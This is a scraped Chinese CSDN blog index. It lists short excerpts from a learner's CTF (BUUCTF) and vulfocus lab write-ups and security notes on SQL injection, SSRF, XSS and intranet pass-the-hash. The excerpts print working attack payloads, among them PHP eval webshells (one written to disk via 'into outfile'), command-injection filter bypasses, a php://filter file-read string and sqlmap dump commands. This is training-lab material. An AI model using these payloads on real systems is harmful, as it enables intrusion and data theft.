自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(68)
  • 收藏
  • 关注

原创 Tomcat任意文件上传CVE-2017-12615

vulfocus靶场

2022-10-21 09:09:57 161 1

原创 Shiro反序列化CVE-2016-4437

vulfocus靶场

2022-10-20 09:00:24 234

原创 Tomcat弱口令上传war包getshell

vulfocus靶场

2022-10-19 16:54:26 430

原创 Apache文件上传漏洞

vulfocus靶场

2022-10-19 10:55:13 364

原创 Apache 后缀解析漏洞

vulfocus靶场

2022-10-19 10:23:56 358

原创 Apache HTTPd 2.4.49 CVE-2021-41773路径穿越

vulfocus靶场

2022-10-19 10:11:28 105

原创 ThinkPHP3.2.x 代码执行漏洞

vulfocus靶场

2022-10-19 09:09:01 1700

原创 XXE 实体注入

服务器因为你的传参发送数据包我的传参为什么会让服务器发送数据包?翻译网页功能如何实现翻译网站直接替代我们去访问目标站点,然后获得内容后查询英文对应,然后处理完返回给用户典型的SSRF:用户传参然后服务器去访问SSRF危害:访问内网(外紧内松) 隐藏攻击者(当做跳板机来躲避追踪) 攻击目标本机(dict:// file:// 读取文件)(有些网站对127.0.0.1的访问不设防) ...

2022-04-27 13:01:47 227

原创 SSRF服务器端请求伪造

服务器因为你的传参发送数据包我的传参为什么会让服务器发送数据包?翻译网页功能如何实现翻译网站直接替代我们去访问目标站点,然后获得内容后查询英文对应,然后处理完返回给用户典型的SSRF:用户传参然后服务器去访问SSRF危害:访问内网(外紧内松) 隐藏攻击者(当做跳板机来躲避追踪) 攻击目标本机(dict:// file:// 读取文件)(有些网站对127.0.0.1的访问不设防) ...

2022-04-27 11:27:59 183

原创 内网渗透

很多漏洞都是管理员为了偷懒而产生的,所以体验感和安全永远在对立面,越方便,越危险域:可以由若干台电脑组成(分高低贵贱)域控:域的管理员机器成员机:会被域控控制域控对域最直接操作是 域控主机的管理员账号密码可以登录任意一台域中主机猕猴桃抓取密码后没有密码Windows server 高版本不存储明文密码1、修改注册列表让他存储,等待他人再次登陆了2、哈希传递哈希传递:Cookie(不需要账号密码就能登录的凭证)直接拿密文+账户名去登录PsEx

2022-04-26 17:19:14 244

原创 内网渗透 雾

(传参后界面变化,删除传参也不会改变)可能是http变成了https,插件问题SQL注入可以写webshellinto outfile 导出文件into dumpfile 导出文件将查询的结果导出成文件http://xxx.com/?id=1 union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/456.php'Webshell管理工具菜刀、蚁剑 => 一句话木马直

2022-04-26 15:26:40 574

原创 SQL注入

SQL注入的核心:将用户的输入拼接到sql语句中,并被当做代码执行注入基本流程:判断是否存在注入判断字段数判断显错位置判断库名判断表名判断列名寻找具体数据 SQL注入: union =>联合查询:将两条SQL语句的结果一齐输出(满足条件:相同字段数) order by =>排序(得到原有查询语句输出结果有几个字段) database() =...

2022-02-17 15:36:09 3087

原创 验证码绕过、密码找回

验证码可以防恶意破解密码、刷票、论坛灌水等等验证码绕过: 1、脚本识别 2、逻辑绕过一、前端验证码,后端没有验证二、验证码设置没有校验,乱输也能成功三、验证码可重复使用四、验证码空值绕过。抓包删除验证码传参五、验证码干扰过低,轻松使用脚本识别六、验证码不是图片,在HTML页面输出七、验证码可控,比如在URL中八、验证码有规则,比如时间戳后6位九、有万能验证码,比如输入000000就能直接绕过十、验证码藏在Cookie中十一、...

2021-10-28 17:10:44 1207

原创 BUUCTF WEB [ACTF2020 新生赛]Upload1

又是文件上传直接GIF89a? <script language="php">eval($_REQUEST[1])</script>上传php一句话木马抓包改不让改那就传图片马写着写着突然想起来上一道图片上传的问题出在哪了上传图片之后忘记把jpg格式改成phtml了所以菜刀一直连不上这题和上题一模一样就不写了...

2021-10-19 15:23:54 354

原创 BUUCTF WEB [RoarCTF 2019]Easy Calc1

看源码有waf有个calc.php打开是过滤规则<?phperror_reporting(0);if(!isset($_GET['num'])){ //判断是否为空 show_source(__FILE__);}else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\',...

2021-10-19 14:59:22 2504

原创 BUUCTF WEB [极客大挑战 2019]Upload1

上传图片第一时间想到上传木马先试一下<?php eval($_REQUEST[8])?>写到txt中改后缀jpg上传看来不行试一下图片马copy yy.jpg/b + muamua.php mama.jpg上传还是不行换个思路提示过滤了<?去百度找找有没有其他的一句话木马GIF89a? <script language="php">eval($_REQUEST[1])</script>这个没有'&...

2021-10-19 14:01:55 152

原创 BUUCTF WEB [极客大挑战 2019]Http1

检查源码有个PHP的连接打开没有从这个地址跳转所以想到抓包修改请求头添加referer头可以证明你的访问从哪来继续改又要求本地访问这个不会了问度娘得知一个叫X-Forwarded-For的扩展头X-Forwarded-For:localhostX-Forwarded-For:127.0.0.1都可以...

2021-10-19 10:44:27 147

原创 BUUCTF WEB [极客大挑战 2019]Knife1

上来就是一句话木马先菜刀连接试试结束了

2021-10-19 10:25:39 118

原创 BUUCTF WEB [GXYCTF2019]Ping Ping Ping1

直接试试传参ip他确实去ping了昨天也碰到过一个差不多的题目所以试一下linux的指令?ip=192.168.1.1;ls成功了果然是linux尝试打开flag.php看提示应该是过滤了空格上百度找到了几种代替空格的方法%20(space)、%09(tab)、$IFS$9、${IFS}$9、 {IFS}、IFS测试发现括号也被过滤了所以使用$IFS$9代替空格继续打开flag.php还是失败了试试打开index.phpc...

2021-10-19 10:12:50 166

原创 BUUCTF WEB [极客大挑战 2019]LoveSQL1

首先查看源码,没什么发现继续尝试万能密码成功登录MD5解密无果看起来不是因为题目提示SQL,所以试一下注入使用他给的密码登录admin在url中使用order by,查询到有3个字段直接使用union select 1,2,3发现回显没有改变,将password的值改为1,显错注入?username=admin&password=1'union select 1,table_name,3 from information_schema...

2021-10-18 22:28:14 157

原创 BUUCTF WEB [ACTF2020 新生赛]Exec1

使用管道符|执行ls可以发现只有一个index.php文件使用../返回上一层没什么发现,继续返回上一层直到第三次发现flag文件使用cat打开flag常见管道符1、|(直接执行|后面的语句)2、&(&前面和后面命令都要执行,无论前面真假)3、||(如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句)4、&&(如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令)Linux常用命令...

2021-10-18 19:47:58 203

原创 BUUCTF WEB [极客大挑战 2019]Secret File1(抓包、代码审计、文件包含)

首先是一个黑色界面看起来没什么可以点击的地方其实有,瞎点还真找到了大概在这里不过也不用费力去找,直接看源码,发现链接点击进入Archive_room.php页面中间一个按钮,点击进入看看盲猜一手他有问题,尝试抓包看看重发得到一个被注释的php访问又是代码审计strstr() — 查找字符串的首次出现stristr() — strstr() 函数的忽略大小写版本所以要构造一个没有../没有tp没有input没有data的payl...

2021-10-18 15:49:33 1404

原创 BUUCTF WEB [SUCTF 2019]EasySQL1

根据题目可知是注入没有回显,排除联合查询接着尝试布尔盲注1' and length(database())>=1-- qwe还是Nonono尝试时间盲注还是Nonono尝试刚学的堆叠注入发现可以执行1;show columns from Flag;-- asd不给查字段了百度得知源码中的查询语句select $post['query']||flag from Flag输入1拼接后可得 select 1||flag fr...

2021-10-18 15:18:53 365

原创 BUUCTF WEB Include(文件包含)

查看源码,什么都没有点击tips题目名称也提示了,是文件包含漏洞百度了解到php://filter伪协议?file=php://filter/read=convert.base64-encode/resource=flag.php

2021-10-18 14:24:10 1971

原创 BUUCTF WEB 随便注

题目是注入,于是尝试SQL注入order by 2得到两个字段尝试联合查询时发现禁用了select百度了解到堆叠查询用;将语句隔开发现可以使用堆叠注入继续查询表名查询表中的字段名0';show columns from words;-- qwe查询1919810931114514表的时候出现了问题百度了解到数字表名需要用反引号``括起来0';show columns from `1919810931114514`;-- asd...

2021-10-18 14:06:40 166

原创 BUUCTF WEB Havefun

查看源码?cat=dog得到flag

2021-10-18 11:32:37 12300

原创 BUUCTF WEB EasySQL

看见登录页面查看源码发现什么都没有第一反应尝试万能密码直接出了flag

2021-10-18 11:30:39 129

原创 BUUCTF WEB WarmUp(代码审计)

检查源码发现提示查看source.php进行代码审计进入hint.php查看提示得到存储flag的文件名<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=&...

2021-10-18 11:24:41 207

原创 服务端请求伪造

SSRF成因SSRF的成因大都是由于服务端提供了从其他服务器或应用中获取数据的功能,但没有对目标地址做出有效的过滤而造成的。比如:A网站是所有人都可以访问的外网网站B网站是内部访问的网站用A网站访问B网站请求资源,而且A网站没有检测用户的访问是否合法,以A网站的身份去访问B网站,从而有攻击B网站的机会。防护绕过一般都是用正则匹配来对请求地址进行过滤限制请求特定域名 禁止请求内网IP绕过:1、使用http://[email protected]、IP转换为

2021-10-10 13:53:49 560

原创 跨站脚本攻击

跨站脚本攻击(XSS)可以使攻击者向网页中注入恶意代码,导致用户浏览器在加载网页、渲染HTML文档时就会执行攻击者的恶意代码。常见XSS漏洞分类·、反射型XSS<?php echo 'your input:' . $_GET['input'];?>客户端输入的值没有经过任何过滤就输出,所以攻击者可以添加?input=<script>alert(1)</script>网页会弹框,内容为1。2、存储型XSS存储型...

2021-09-30 08:15:46 291

原创 Sqlmap

Sqlmap--dbs =>获得库名 python sqlmap.py -u http://59.63.200.79:8003/?id=1 --dbs -D =>指定库 --tables =>表 -T =>指定表 --columns =>字段 -C =>指定字段 --dump =>获取数据库中的数据(高危命令)脱库 python sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T.

2021-08-18 18:41:08 88

原创 PHP正则表达式

正则表达式的特点:灵活性、逻辑性和功能性非常强 可以迅速地用极简单的方式达到字符串的复杂控制 对于刚接触的人来说,比较晦涩难懂正则表达式的用途:判断字符串是否符合某一规则(判断是否符合手机号、邮箱规则等) 从一个字符串中找出符合规则的所有字符串(取HTML标签名等)preg_match_all(正则表达式、匹配字符串、匹配到的东西放入字符串)preg_repalce(正则表达式、替换成什么、匹配字符串)常用转义字符:数字:\d非数字:\D空白字...

2021-08-14 21:03:33 327

原创 JWT验证

在工具包中新建JwtUtilspublic class JwtUtils { /*** * 签发JWT令牌 * */ public static String getToken(){ String token = ""; String STR = "yctxdy";//盐 token = JWT.create().withAudience("hly") .withExpires.

2021-06-02 17:55:02 440

原创 Ajax加载数据爬虫

目标网页https://spa1.scrape.center/准备工作设置日志等级设置robot规则为了降低对网页的压力,设置下载延迟更改默认请求头新建需要的字段开启管道————————————————————是Ajax请求获取数据所以控制台勾选XHR筛选查看Preview,找到需要的数据和之前的步骤差不多,获取数据方式不同 def parse(self, response): result = response.json()

2021-05-14 13:12:04 184

原创 爬虫练习

学习网址————————————————————————————————python的print字符串前面加f表示格式化字符串加 f 后可以在字符串里面使用用花括号括起来的变量和表达式,如果字符串里面没有表达式,那么前面加不加f输出应该都一样.————————————————————————————————scrapy.RequestRequest类是一个http请求的类,对于爬虫而言是一个很重要的类。通常在Spider中创建这样的一个请求,在Downloader中执行这样的一个请求。同时也有

2021-05-14 11:47:29 67

原创 邮件发送

导入邮箱验证的包开启qq邮箱的smtp服务配置文件在Test中添加以下内容运行程序,在网页中输入urlhttp://localhost:10086/test/sendMail对方成功收到邮件

2021-05-13 20:15:33 85

原创 热加载和数据库删改查

热加载在pom.xml里的dependencies下添加以下内容<dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-devtools</artifactId> <optional>true</optional> <scope>runtime</scope>

2021-05-10 20:00:08 125

原创 注册界面

在Main.vue中添加内容输入npm run dev打开弹出的地址修改script标签居中对话框并修改样式添加点击事件

2021-05-08 17:14:28 64

原创 2021-05-07

安装vscode并导入包下载node.js选择长期更新版cmd输入npm config set registry https://registry.npm.taobao.org更换npm镜像源输入npm -v查看版本npm install -g npm更新npm新建文件夹Test在路径中输入cmd快速打开命令窗口在cmd中输入vue init webpack创建vue项目输入npm run dev执行打开http://localhost:8081成功———————

2021-05-07 15:54:01 71

原创 生成数据

打开pom.xml在plugins标签下加入<!-- mybatis逆向工程 --> <plugin> <groupId>org.mybatis.generator</groupId> <artifactId>mybatis-generator-maven-plugin</artifactId>

2021-05-07 15:07:37 74

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除